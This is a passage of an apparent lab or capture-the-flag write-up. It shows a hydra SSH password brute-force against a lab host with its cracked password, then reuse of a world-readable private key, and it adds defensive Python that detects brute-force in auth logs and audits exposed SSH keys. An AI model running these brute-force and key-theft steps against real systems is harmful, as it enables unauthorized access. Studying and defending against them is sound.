As we know the username, we can try to brute-force the password over SSH with [hydra]:
```
$ hydra -l jan -P /usr/share/wordlists/passwords/rockyou.txt ssh://10.10.126.77
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-03 00:38:09
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://10.10.126.77:22/
[STATUS] 180.00 tries/min, 180 tries in 00:01h, 14344222 to do in 1328:11h, 16 active
[STATUS] 133.00 tries/min, 399 tries in 00:03h, 14344003 to do in 1797:30h, 16 active
[22][ssh] host: 10.10.126.77 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 6 final worker threads did not complete until end.
[ERROR] 6 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-03 00:44:54
```
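A run like the one above is very loud on the target: 16 parallel workers produce hundreds of `Failed password` lines per minute in sshd's auth log, followed by one `Accepted password` from the same source once the wordlist hits. The following detector is an added example (not part of the original writeup) that parses constructed auth.log lines in the standard Ubuntu syslog format, counts failures per source IP in a sliding window, and raises a second alert when a flagged source later succeeds. The host name, PIDs and addresses in the sample are made up; the thresholds are assumptions a defender would tune.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample of sshd lines as written to /var/log/auth.log (syslog format, year omitted).
SAMPLE_AUTH_LOG = """\
Sep  3 00:38:10 basic sshd[1201]: Failed password for jan from 10.10.14.3 port 41022 ssh2
Sep  3 00:38:10 basic sshd[1202]: Failed password for jan from 10.10.14.3 port 41024 ssh2
Sep  3 00:38:11 basic sshd[1203]: Failed password for jan from 10.10.14.3 port 41026 ssh2
Sep  3 00:38:11 basic sshd[1204]: Failed password for jan from 10.10.14.3 port 41028 ssh2
Sep  3 00:38:12 basic sshd[1205]: Failed password for jan from 10.10.14.3 port 41030 ssh2
Sep  3 00:38:12 basic sshd[1206]: Failed password for invalid user admin from 10.10.14.3 port 41032 ssh2
Sep  3 00:39:01 basic sshd[1300]: Failed password for kay from 192.168.1.20 port 50001 ssh2
Sep  3 00:44:50 basic sshd[1410]: Accepted password for jan from 10.10.14.3 port 41990 ssh2
Sep  3 00:45:00 basic CRON[1411]: pam_unix(cron:session): session opened for user root by (uid=0)
"""

# Matches both "Failed password for jan ..." and "Failed password for invalid user admin ...".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+ ssh2$"
)


def parse_line(line, year=2020):
    """Return (timestamp, outcome, user, source_ip) for an sshd password line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # syslog lines carry no year; the caller supplies it (assumed 2020 for the sample).
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["outcome"], m["user"], m["src"]


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Sliding-window detector.

    Emits ("bruteforce", src, count) the first time a source reaches `threshold`
    failures within `window_seconds`, and ("success_after_bruteforce", src, user)
    whenever an already-flagged source gets an Accepted password afterwards.
    """
    failures = defaultdict(deque)  # src -> timestamps of recent failures
    flagged = set()
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # not an sshd password-auth line (e.g. CRON noise)
        ts, outcome, user, src = rec
        q = failures[src]
        if outcome == "Failed":
            q.append(ts)
            # Drop failures older than the window so a slow trickle does not accumulate.
            while q and (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append(("bruteforce", src, len(q)))
        elif outcome == "Accepted" and src in flagged:
            # The most actionable signal: the guessing worked.
            alerts.append(("success_after_bruteforce", src, user))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG.splitlines()):
        print(alert)
```

On the sample this yields one `bruteforce` alert for `10.10.14.3` at the fifth failure and one `success_after_bruteforce` for user `jan`; the single failure from `192.168.1.20` stays below the threshold. Rate limiting on the server side (which hydra's own `-t 4` warning alludes to) and key-only authentication remove the condition entirely rather than just detecting it.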
Kay's SSH private key is readable by everyone, so we can save it on our machine
and change its permissions so OpenSSH won't complain:
```
$ chmod 600 kay.key
```
Then we can try to authenticate over SSH with this key:
```
$ ssh kay@10.10.126.77 -i kay.key
Enter passphrase for key 'kay.key':
```
But for now we are blocked: the private key is encrypted and needs a passphrase
to be unlocked.
We can try to crack the private key passphrase with John The Ripper.
First we have to convert the key into a format john can read.
Then we can try to brute-force the passphrase.
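Both findings above (a private key readable by other users, and a key whose only remaining protection is a passphrase that john can attack offline) are things a host owner can audit for directly. The script below is an added example, not part of the original writeup: it walks a directory tree, reports every private key whose mode bits grant read access to group or others, and tells the encrypted keys from the plaintext ones by parsing the file header (the `Proc-Type: 4,ENCRYPTED` header for legacy PEM keys, and the cipher-name field after the `openssh-key-v1` magic for the modern OpenSSH format). The demo tree it builds under a temp directory is a constructed fixture; the key bodies are synthetic bytes that satisfy only the header parser, not real keys.

```python
import base64
import os
import stat
import struct
import tempfile

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def key_encryption_status(data):
    """Return 'encrypted', 'plaintext' or 'unknown' for the bytes of a private-key file."""
    lines = [l.strip() for l in data.decode("ascii", errors="replace").splitlines()]
    if not lines or not lines[0].startswith("-----BEGIN ") or "PRIVATE KEY" not in lines[0]:
        return "unknown"
    if "OPENSSH PRIVATE KEY" in lines[0]:
        # Modern format: base64 body = magic, then the cipher name as a length-prefixed string.
        body = "".join(l for l in lines[1:] if not l.startswith("-----"))
        try:
            raw = base64.b64decode(body, validate=True)
        except ValueError:
            return "unknown"
        off = len(OPENSSH_MAGIC)
        if not raw.startswith(OPENSSH_MAGIC) or len(raw) < off + 4:
            return "unknown"
        (n,) = struct.unpack(">I", raw[off:off + 4])
        cipher = raw[off + 4:off + 4 + n]
        if len(cipher) != n:
            return "unknown"
        return "plaintext" if cipher == b"none" else "encrypted"
    # Legacy PEM (RSA/DSA/EC): encryption is signalled by a Proc-Type header before the blank line.
    for h in lines[1:]:
        if h == "":
            break
        if h.startswith("Proc-Type:") and "ENCRYPTED" in h:
            return "encrypted"
    return "plaintext"


def audit_private_keys(root):
    """Return sorted (relative path, octal mode, status) for keys readable by group or others."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) > 1_000_000:
                    continue  # real keys are a few KB; skip anything large
                with open(path, "rb") as f:
                    data = f.read()
            except OSError:
                continue
            if b"PRIVATE KEY-----" not in data[:4096]:
                continue
            mode = stat.S_IMODE(os.stat(path).st_mode)
            if mode & (stat.S_IRGRP | stat.S_IROTH):
                findings.append((os.path.relpath(path, root), oct(mode), key_encryption_status(data)))
    return sorted(findings)


def make_demo_tree():
    """Constructed fixture (not real keys): two world-readable keys and one properly protected key."""
    root = tempfile.mkdtemp(prefix="keyaudit-")
    ssh_dir = os.path.join(root, "home", "kay", ".ssh")
    os.makedirs(ssh_dir)
    # Synthetic OpenSSH body: magic + ciphername "none" + kdfname "none"; enough for the header parser.
    body = OPENSSH_MAGIC + struct.pack(">I", 4) + b"none" + struct.pack(">I", 4) + b"none"
    plain_openssh = (b"-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.encodebytes(body)
                     + b"-----END OPENSSH PRIVATE KEY-----\n")
    encrypted_pem = (b"-----BEGIN RSA PRIVATE KEY-----\n"
                     b"Proc-Type: 4,ENCRYPTED\n"
                     b"DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF\n\n"
                     b"AAAA\n-----END RSA PRIVATE KEY-----\n")
    files = {
        "id_rsa_plain": (plain_openssh, 0o644),  # world-readable and unencrypted: worst case
        "id_rsa_enc": (encrypted_pem, 0o644),    # world-readable, passphrase is the only barrier
        "id_ed25519": (plain_openssh, 0o600),    # owner-only: not reported
    }
    for name, (content, mode) in files.items():
        p = os.path.join(ssh_dir, name)
        with open(p, "wb") as f:
            f.write(content)
        os.chmod(p, mode)
    return root


if __name__ == "__main__":
    for finding in audit_private_keys(make_demo_tree()):
        print(finding)
```

Run against `/home` on a real host the same function flags the condition the writeup exploited; the fix is `chmod 600` on the key (and ideally `chmod 700` on `~/.ssh`), and for keys reported as `encrypted` the passphrase should be long enough that an offline wordlist attack with john is not practical.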